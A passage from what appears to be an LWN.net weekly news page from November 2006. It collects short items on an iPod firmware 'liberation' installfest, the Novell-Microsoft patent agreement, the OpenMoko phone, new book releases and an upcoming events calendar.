Liberating iPods in Cambridge (NewsForge)

Benjamin Mako Hill covers an iPod Liberation event in Cambridge. "Last month, the MIT Media Lab Computing Counter Culture Group and the Harvard Free Culture Group held an "iPod Liberation event" -- a RockBox and iPodLinux "installfest" for Apple iPods. The event was held as a response to the fact that Apple installs iPods with an operating system -- a "firmware" -- that conflicts with the ideals of free and open source software and free culture and treats users parternalistically and adversarially. During the event, dubbed iRony, users were walked through the process of installing flexible and featureful free/open source software firmware -- without DRM -- onto their digital audio players."

Comments (none posted)

Can open source methodology make a movie? (NewsForge)

NewsForge looks at the creation of the film "Digital Tipping Point" using open-source techniques. "However, only about 220 minutes of film have been posted online. The film segments are being made available on the Internet Archive under the Creative Commons Attribute-ShareAlike license. The project also has a four-minute proof of concept video on the Internet Archive and YouTube, but it's far from a completed film. At this point, the project is soliciting help from the open source community in doing post-production work on the film -- including transcription of scenes in the archive, edits of the footage, translations, and providing plot suggestions for the film."

Comments (none posted)

Researching Web Science (PC Magazine)

PC Magazine covers the launch of the Web Science Research Initiative, one of the founders is Tim Berners-Lee. "This morning, the Massachusetts Institute of Technology MIT and the University of Southampton announced The Web Science Research Initiative (WSRI) , basically a group designed to set a research agenda for understanding the scientific, technical and social challenges underlying the growth of the Web. WSRI will be headquartered at the Computer Science and Artificial Intelligence Laboratory (CSAIL) at MIT and at the School of Electronics and Computer Science (ECS) at the University of Southampton. Initial plans call for joint research projects, workshops and student/faculty exchanges between the two institutions."

Comments (none posted)

Page editor: Forrest Cook

Announcements

Non-Commercial announcements

Linuxaudio.org announces new members

Linuxaudio.org, a not-for-profit consortium of libre software projects and artists, companies, institutions, organizations, and hardware vendors, has announced its newest members. "In its bi-monthly membership update, Linuxaudio.org is pleased to announce nine new members, bringing the total number of members to fifty two".

Full Story (comments: none)

OpenVZ now available on the latest Linux kernel

The OpenVZ project has announced availability of beta level software based on the Linux kernel 2.6.18.

Full Story (comments: none)

Google Pledges Annual Donation to Samba

The Samba project has announced the pledge of an annual donation by Google. "The Samba Team is delighted to announce that Google has committed to providing the Samba project with an annual donation of US $20,000.00. "This is fantastic news for the Samba project" said team member Andrew Tridgell, "and will allow us to provide more support for developers who could not otherwise afford the travel expenses to attend conferences. Contributions like these make a huge difference!"."

Comments (none posted)

Commercial announcements

Accenture Joins The Open Group

The Open Group has announced its latest member, Accenture. "Accenture will serve on The Open Group's Architecture Forum, which identifies and establishes standards for the development of enterprise-wide information systems."

Comments (none posted)

AdventNet upgrades ManageEngine firewall analyzer

AdventNet Inc. has announced the release of version 4.0 of its ManageEngine Firewall Analyzer. "ManageEngine Firewall Analyzer is an enterprise-class, vendor-neutral software for firewall log analysis. It enhances the availability and security of your network by continuously collecting, analyzing, and reporting on the firewall traffic logs. Firewall Analyzer supports almost all major firewalls including Cisco Pix, CheckPoint, NetScreen, WatchGuard, SonicWall, FortiGate and many more!"

Comments (none posted)

CA joins Community Patent Review Project as lead sponsor

CA has announced that it has joined the Community Patent Review Project. "Selected by the U.S. Patent & Trademark Office (USPTO) as one of its strategic initiatives to improve and streamline the patent application review process, the Community Patent Review project is a collaborative effort between USPTO and New York Law School's Institute for Information Law & Policy. The project will deploy an online system to allow the scientific community to provide input into the patent examination process."

Comments (none posted)

Cleversafe announces the Cleversafe Desktop

Cleversafe has announced the release of the Cleversafe Desktop, an open-source application for managing dispersed storage grids. "The Cleversafe Desktop will provide a way for anyone -- technical or not -- to take advantage of Dispersed Storage, and complements Cleversafe's other interfaces, Command Line Interface (CLI), Dispersed Storage Grid File System (DSGFS) and Dispersed Storage API (DSAPI)."

Comments (none posted)

Novell's press release on partnership with Microsoft

Here is Novell's press release on its deal with Microsoft. There are a number of aspects to it, including joint marketing of products, the establishment of a shared research facility to work on topics like virtualization and document formats, and a patent deal: "As part of this agreement, Microsoft will provide a covenant not to assert its patent rights against customers who have purchased SUSE Linux Enterprise Server or other covered products from Novell, and Novell will provide an identical covenant to customers who have a licensed version of Windows or other covered products from Microsoft."

Comments (63 posted)

Some more details from Novell

Here's a new press release from Novell on its Microsoft deal. The company is getting almost $250 million from Microsoft up front. There's some real weasel words with regard to the GPL: "Under the patent cooperation agreement, Novell's customers receive directly from Microsoft a covenant not to sue. Novell does not receive a patent license or covenant not to sue from Microsoft, and we have not agreed with Microsoft to any condition that would contradict the conditions of the GPL. Our agreement does not affect the freedom that Novell or anyone else in the open source community, including developers, has under the GPL and does not impose any condition that would contradict the conditions of the GPL." Some serious hair-splitting is going on here.

Comments (36 posted)

The OpenMoko open phone

A company called OpenMoko has announced the availability of "a completely integrated open source mobile communications platform." It's based on the OpenEmbedded platform and is meant to be hackable. Some pictures are available on the OpenMoko site. Much of the system-level software was done by Harald Welte, who says "So basically, from a Free Software community level, this is exactly the kind of phone you want to get involved with, and play with. Yes, it's not the perfect phone. It runs a proprietary GSM stack on a separate processor. There are some minor, self-contained proprietary bits on the back end side in userspace. But well, it's probably the best you can do as a first shot of a new generation of devices, and without too much existing market power to put on upstream vendors."

Comments (none posted)

XenSource announces XenEnterprise for Windows and Linux

XenSource, Inc. has announced XenEnterprise for Windows and Linux, a commercially-packaged Xen virtualization solution supporting both Microsoft Windows and Linux guests.

Full Story (comments: none)

Xilinx announces Virtex-5 LXT logic design solution

Xilinx, Inc. has announced a logic design system for their Virtex-5 LXT FPGA chips. "Xilinx, Inc. today announced availability of a complete logic design solution including an update to its Integrated Software Environment (ISE(TM)) design tools for their newest Virtex(TM)-5 LXT Platform FPGAs, the industry's first FPGA to deliver hard- coded PCI Express(R) technology and Tri-mode Ethernet Media Controller (MAC) blocks. ISE 8.2i delivers a unique integrated timing closure environment and productivity-enhancing features, allowing users to fully exploit the connectivity, performance, and power advantages of the Virtex-5 LXT family."

Comments (none posted)

New Books

The Compleat Canadian Copyright Act 1921-2006

The second edition of the book The Compleat Canadian Copyright Act 1921-2006 has been published. "It is a reference work documenting 85 years of the shifting balance of power between creators, users, proprietors, Parliament and foreign interests reflected in the changing provisions of the Act. It is the record of legislative attempts to accommodate new ways, new technologies, to fix the expression of ideas or knowledge into a material matrix thereby creating new subject matter for copyright, e.g., ‘talking’ pictures, radio and television, VCRs, DVDs, WWW, et al and in the process creating streams of royalties to be gained through their exploitation."

Full Story (comments: none)

Rocky Nook releases "GIMP 2 for Photographers"

Rocky Nook has published the book GIMP 2 for Photographers by Klaus Goelker.

Full Story (comments: none)

Learning JavaScript - O'Reilly's Latest Release

O'Reilly has published the book Learning JavaScript by Shelley Powers.

Full Story (comments: none)

Prentice Hall Professional Releases Second Edition of Linux Administration Handbook

Prentice Hall Professional has published the book Linux Administration Handbook, second edition by Evi Nemeth, Garth Snyder and Trent R. Hein.

Full Story (comments: none)

Syngress Releases "WarDriving and Wireless Penetration Testing"

Syngress Publishing, Inc. has published the book WarDriving & Wireless Penetration Testing by Chris Hurley, Frank Thornton, Dan Connelly, Brian Baker, and edited by Russ Rogers.

Full Story (comments: none)

Resources

The Austin Group announces the availability of revision draft 2

The Austin Group has released the second draft of the Austin Group specifications. "We're pleased to announce the availability of draft 2 of the Revision to the Austin Group specifications. This is the second draft of the revision project and is a ballot draft with IEEE and ISO balloting, for the full roadmap to the revision see Austin/319."

Full Story (comments: none)

The Open Group announces new API sets for single UNIX Specification

The Open Group has announced the publication of new API sets for the next revision of the Single UNIX Specification. "Developed by The Open Group's Base Working group, the Open Group Technical Standards Extended API Sets Part 1 to 4 add eighty-eight new interfaces. The new interfaces include support for the use of locales in multi-threaded applications, the addition of robust mutexes, a set of filesystem routines that avoid common race conditions, and a number of widely used interfaces drawn from the open source community."

Full Story (comments: none)

The Python Journal lives again!

Richard Jones reports on the return of the Python Journal. "The Python Journal has been resurrected. We're still sorting out some bits, but we're pretty happy with the first issue. I'll be helping out on the technical side, sorting out typesetting and the website. There might even be some articles from me, though I'll be dealing with OSDC 2006 first."

Comments (none posted)

Education and Certification

PostgreSQL CE 8 Silver Release

A new PostgreSQL certification exam has been announced. "PostgreSQL CE is a certification exam for PostgreSQL engineers who are involved in system development, administration, maintenance, etc. The first English version of PostgreSQL was released on March, 2005, and was based on PostgreSQL 7.4. The newest exam to be released this time will be based on PostgreSQL 8.0, which includes PITR, Tablespace and so on."

Comments (none posted)

Event Reports

Presentations and Projects Plentiful at Gelato ICE

Gelato presents coverage of the recent Gelato ICE: Itanium(r) Conference & Expo in Singapore. "Over 100 scientists, developers, and engineers from more than 30 companies and institutions convened from all around the globe for the October 2006 Gelato ICE: Itanium(r) Conference & Expo held in Singapore."

Full Story (comments: none)

Plone Conference 2006 blows away (z3lab.org)

z3lab.org presents coverage of the 2006 Plone Conference. "This is how my first day (or shall I say evening?) in Seattle started. Alex Limi later reported in his keynote that he had a similiar conversation in a taxicab, except his driver actually knew what Open Source and SourceForge were. That's almost hard to believe. Fact is, though, Plone's more popular than ever. And so I was not the only one who came to the city that is usually better known for its proprietary software vendor. 360 other people decided to do so, too! There are some statistics about that number that are worth mentioning".

Comments (none posted)

Calls for Presentations

2007 PHP Quebec Conference CFP

A call for proposals has gone out for the 2007 PHP Quebec Conference. The event takes place on March 14-16, 2007 in Montreal, Canada, submissions are due by November 17.

Comments (none posted)

RailsConf 2007 CFP

A Call for Participation has gone out for RailsConf 2007. The event takes place from May 17-20, 2007 in Portland, Oregon, proposals are due by November 27.

Full Story (comments: none)

Upcoming Events

OpenOffice.org 2007 Conference - Call for Location

A call for location has gone out for the OpenOffice.org 2007 Conference. "The annual OpenOffice.org Conference continues to go from strength to strength, with this year's glittering event in Lyon, France attracting over 600 registrations and enjoying a civic reception laid on by the Mayor of Lyon in the historic town hall. Can your team do even better next year? We are collecting applications from teams who are willing to organize OOoConf 2007."

Full Story (comments: none)

Pd Q and Faust interfaces / ICMC 2006 demo

Albert Graef will be holding demos of the Pd Q and Faust interfaces at the icmc2006 conference in New Orleans, Louisiana on November 11. "Yann and me will show Faust, Q and their Pd and SuperCollider interfaces at the International Computer Music Conference (ICMC) next week in New Orleans, so if you have an opportunity to come we hope to meet you there."

Full Story (comments: none)

Events: November 16, 2006 to January 15, 2007

The following event listing is taken from the LWN.net Calendar.

Date(s)EventLocation
November 11
November 17
Supercomputing 2006 Tampa, FL, USA
November 14
November 16
LinuxWorld Cologne Cologne, Germany
November 16
November 17
III Latin American Free Software Conference Iguassu Falls, Brazil
November 16
November 17
Conference on Software Patents Boston, MA, USA
November 18 Richard Stallman speaks in Seoul Seoul, South Korea
November 21
November 24
15th International Conference on Computing Mexico City, Mexico,
November 24
November 26
FOSS.IN 2006 Bangalore, India
November 25 FAVE 2006 - free software multimedia event in London London, UK
November 27
November 30
PacSec Applied Security Conference 2006 Tokyo, Japan
December 1
December 2
PHP Conference Brasil Sao Paolo, Brazil
December 2
December 3
Technical Dutch Open Source Event Eindhoven, the Netherlands
December 3
December 8
Large Installation System Administration Conference Washington, D.C.,
December 5
December 8
Open Source Developers' Conference 2006 Melbourne, Australia,
December 7
December 8
Desktop Architects Meeting Portland, OR, USA
December 9 London Perl Workshop London, England
December 12
December 19
Virtual Congress UnInet Meeting UMeet'2006 irc.uninet.edu, #linux
December 27
December 30
23rd Chaos Communication Congress 2006 Berlin, Germany,
January 11
January 12
Foundations of Open Media Software Sydney, Australia

If your event does not appear here, please tell us about it.

Page editor: Forrest Cook

Copyright © 2006, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds